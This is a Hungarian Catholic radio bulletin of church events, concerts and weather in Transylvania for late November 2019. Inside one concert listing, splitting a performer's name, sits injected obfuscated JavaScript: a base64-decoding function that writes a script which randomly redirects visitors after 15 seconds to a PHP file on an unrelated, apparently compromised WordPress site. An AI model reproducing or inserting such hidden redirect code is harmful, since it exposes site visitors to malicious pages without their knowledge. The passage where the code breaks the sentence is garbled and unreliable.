2019. november 27. – Hírek és programajánló

H Í R E K   D É L B E N

Előadás Csíkszeredában
A Honfoglalás előttől az Európai Unió utánig előadás sorozat keretében november 29-én, pénteken este 6 órától Ilyés Zsolt csíkszentléleki plébános: Gondolatok a szabadságról címmel tart előadást a csíkszeredai városházán. A rendezvény nyitott, minden érdeklődőt várnak.

Fiatalok találkozója
A Temesvári Egyházmegyei Ifjúsági Központ szervezésében a hegyvidéki főesperesség fiataljainak találkozóját a lugosi plébánián tartják, november 30-án, szombaton. A rendezvény 10 órakor kezdődik, a programban katekézis, kiscsoportos tevékenység szerepel. Délután 4 órakor Pál József-Csaba megyés püspök szentmisét mutat be a helyi plébániatemplomban, amelynek keretében a fiatalok meggyújtják az első adventi gyertyát. Az összejövetelre az egyházmegye több plébániájáról is várnak résztvevőket, lelkipásztorokat és fiatalokat.

Képekben a keresztény értékek
Csíksomlyó és Kárpát-medencei Keresztény Értékek címmel rendhagyó fotóművészeti kiállításnak ad otthont a nagykárolyi Károlyi-kastély a Vasile Vénig László Fotóklub szervezésében november 30-án, szombaton délután 4 órai kezdéssel. A kiállításra kerülő alkotások egyházi-vallási tematikájúak. a megnyitó az Advent kezdetéhez kötődik. A tárlat pedig január 7-éig lesz látogatható, vagyis Vízkeresztig, így ölelve át az egész Karácsonyi ünnepkört.

Adventi ifjúsági imaórák
Szatmárnémetiben, advent vasárnapjain este 7 órától imaórát, karácsonyra való felkészülést tartanak a város négy templomában. Az első alkalom, december 1-én, a Hildegárda templomban lesz, az erősség és a bátorság erényeit tartva szem előtt, december 8-án, a Kis Szent Teréz templomban találkoznak a fiatalok és az igazságosságra figyelnek. Advent harmadik vasárnapján a Szentlélek templomban lesz az imaóra a mértékletesség témájában, és végül december 22-én, a Székesegyházban zárul, ahol az okosságról elmélkednek.

Püspöki szentmise Petrozsényben
A petrozsényi Szent Borbála templom búcsúünnepe alkalmából december 4-én, szerdán Pál József Csaba megyéspüspök 11.30 órakor román nyelven, 17 órakor pedig magyar nyelven szentmisét celebrál. A templombúcsú keretében 13 órakor a temesvári Főpásztor megáldja a nemrég elkészült Szent Borbála szobrot.

Adventi lelki hétvége fiataloknak
Nagyon hamar elszalad az advent ideje, és azon kapjuk magunkat, hogy az első gyertya meggyújtása után szinte beesünk a karácsonyfa alá. A szervezők ezt a tapasztalatot szeretnék megváltoztatni egy lelki hétvégével, amelynek során kicsit elcsendesedve előkészíthetjük szívünket a kisded Jézus befogadására. A program a székelyudvarhelyi ferences kolostorban lesz december 6-8 között. Jelentkezés és további információ a ferencesprogramok.ro oldalon.

Sepsiszentgyörgyön az Északi Színház
A Tamási Áron Színház decemberi műsorának különleges eseménye lesz a Szatmárnémeti Északi Színház vendégjátéka. A Scapin című produkciót december 7-én, 8-án és 9-én, szombaton, vasárnap és hétfőn este 7 órától láthatja a szentgyörgyi közönség a Tamási Áron Színház nagytermében.
Az előadás időtartama 2 óra 15 perc egy szünettel. A jegyek ára 30 lej, diákoknak, nyugdíjasoknak 23 lej, csoportoknak személyenként 15 lej. Jegyek válthatóak a sepsiszentgyörgyi Központi Jegyirodában és a www.biletmaster.ro honlapon.

Adventi vásár
A marosvásárhelyi II. Rákóczi Ferenc Római Katolikus Teológiai Líceumban adventi vásárra kerül sor, melynek bevételét az iskola egyik diákjának életmentő gerincműtétére ajánlják fel. Akik tehetik, a műtét költségeit támogathatják december 13-án délelőtt, az adventi vásáron való részvétellel, illetve közvetlen adakozással. Erre a marosvásárhelyi belvárosi Keresztelő Szent János-plébániatemplomban is lehetőség lesz, december 1-én, a vasárnapi szentmisék alkalmával.

Adventi hangverseny
A szentegyházi Gyermekfilharmónia december 13-án, pénteken este fél 8 órától adventi hangversenyt tart a kézdiszentkereszti római katolikus templomban. Belépés díjtalan, adományokat szívesen fogadnak. A helyszínen a korábban megjelent CD lemezek is megvásárolhatóak lesznek.

Időjárás: Az időszakra jellemző sokévi átlagnál melegebb lesz a hét hátra levő részében. A nappali hőmérséklet elérheti a 15 Celsius-fokot, majd november 30-a után 3-4 fokig süllyed a hőmérők higanyszála – derül ki az Országos Meteorológiai Szolgálat előrejelzéséből.
Ma a többfelé párás, ködös reggelt követően napközben nyugat felől megvastagszik a felhőzet, a délután második felében egyre többfelé ered el az eső. Sokfelé élénk, helyenként erős lökések kísérhetik a délies szelet. Hajnalban -4, +7, napközben 7-14 fok várható.

H Í R E K   R E G G E L

Örökös szentségimádási nap
A gyulafehérvári főegyházmegyében a mai nap folyamán a kovásznai templomban tartanak örökös szentségimádási napot. Éljünk minél többen a lehetőséggel, járuljunk az Oltáriszentségben jelen levő Krisztus elé, adjunk hálát minden kapott kegyelemért!

Kiállítás megnyitó
Maszelka János székelyföldi festőművész kiállításának megnyitójára kerül sor ma délután magyar idő szerint 5 órától, a budapesti Forrás Galériában. Maszelka János a székelyföldi tájak festőjeként, a pasztell mestereként vívott ki hírnevet magának. Alkotásain megelevenedni látjuk a paraszti létformát, annak gyötrelmeit és örömeit. Perspektívái természet- és emberközeli látásmódot sugallnak, képein a táj és az ember lelki közösségét, egységét, a természettel való együttélés ősi, tiszta világát ábrázolja. A kiállítás november 28. és december 20. között lesz megtekinthető.

Medjugorje-i imaest
Holnap délután 5 órától Medjugorje-i imaestet tartanak Csíkszeredában a Segítő Mária bentlakás dísztermében.
Az imaalkalom rózsafüzér imával kezdődik, majd szentmisével és szentségimádással folytatódik, melynek végén szentségi áldásban részesülnek a jelenlévők.

Hazajáró közönségtalálkozó
A „Hazajáró” hétről-hétre bakancsot húz és nekiindul, hogy keresztül-kasul bebarangolja a Kárpát-medence varázslatos tájait és megismerje hazánk természeti- és kulturális értékeit, történelmi emlékeit és az ott élő emberek mindennapjait.
Holnap este fél 7 órától a Hazajáró turisztikai-honismereti magazinműsor stábja szeretettel vár mindenkit a nagybányai Teleki Magyar Házban egy közönségtalálkozóra.

Adventváró hangverseny
A sepsiszentgyörgyi Krisztus Király templomban, november 30-án, szombaton az esti 6 órás szentmise alatt Schubert Ász-dúr miséjét adják elő. Fellép a Fekete templomi Bach kórus, Ursula Philippi, Lövenberger Orsolya, Valerica Ambrus, Nicu Simonov, Lőfi Gellért Steffen Schlfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');and vezényletével.

Színházi előadás Kolozsváron
November 30-án, szombaton este 7 órától a kolozsvári János Zsigmond Unitárius Kollégium dísztermében bemutatják a Batthyány család történelmi szerepét megelevenítő egyfelvonásos színdarabot. Gróf Batthyány Lajosné Zichy Antónia gyermekeinek írt megrendítő és őszinte visszaemlékezései alapján követhetjük nyomon férje bicskei elfogatásától a haláláig eltelt időszak eseményeit. Az első magyar miniszterelnök példamutató életét, tragikus sorsát, kivégzésének emlékeit mutatja be a színdarab.

Lelkinapok édesanyáknak
Elfogadás-ajándékozás címmel Nagy Enikő, Kriszta mallersdorfi ferences nővér december 6.-8. között adventi lelkinapokat tart édesanyáknak a Kett pedagógia alkalmazásával. A program a székelyudvarhelyi Szent Pio Lelkigyakorlatos Házban lesz. Előzetes bejelentkezés szükséges december 2-ig a 0266-210537 vagy a 0755-489743-as telefonszámok egyikén.

Adventi lelkinap
December 7-én, szombaton a csíkszeredai szent Kereszt templomban adventi lelkinapot tartanak, „Felejtem, ami mögöttem van és nekifeszülök annak ami előttem van” mottóval. A program délelőtt fél 10 órakor dicsőítéssel kezdődik, majd Fülöp László atya elmélkedése következik, 11 órától szentségimádás és gyónási lehetőség lesz, a lelkinap szentmisével zárul.
Várom az Urat!
Idén a 19. éve annak, hogy a Várom az Urat-fesztivál jelzi a karácsony közeledtét, alkalmat ad az elcsendesedésre és a feltöltődésre. Az érdeklődők a következő helyszíneken és időpontokban hangolódhatnak az elkövetkezendő ünnepre: december 7-én, szombaton Marosvásárhelyen, december 8-án, vasárnap délután 5 órától Székelyudvarhelyen a Digital 3 termében, december 14-én, szombaton Kolozsváron, valamint december 15-én, vasárnap Sepsiszentgyörgyön.

Adventi zenés áhítat
A Nagybányai Református Egyházmegye szervezésében, Adventi zenés áhítatra kerül sor december 15-én, a Nagybánya-óvárosi református templomban, délután 4 órától.
Fellép a Kolozsvári Református Kollégium Kórusa, a Flautino kamaraegyüttes, a Thábor Együttes és Marosán Csaba színművész. Perselybe elhelyezett adományokkal az egyházmegyei ifjúsági missziót lehet támogatni.

Időjárás: Az időszakra jellemző sokévi átlagnál melegebb lesz a hét hátra levő részében. A nappali hőmérséklet elérheti a 15 Celsius-fokot, majd november 30-a után 3-4 fokig süllyed a hőmérők higanyszála – derül ki az Országos Meteorológiai Szolgálat előrejelzéséből.
Ma a többfelé párás, ködös reggelt követően napközben nyugat felől megvastagszik a felhőzet, a délután második felében egyre többfelé ered el az eső. Sokfelé élénk, helyenként erős lökések kísérhetik a délies szelet. Hajnalban -4, +7, napközben 7-14 fok várható.

MRE- Hírszolgálat, 2019. november 27.

About the author

Majoros Gabriella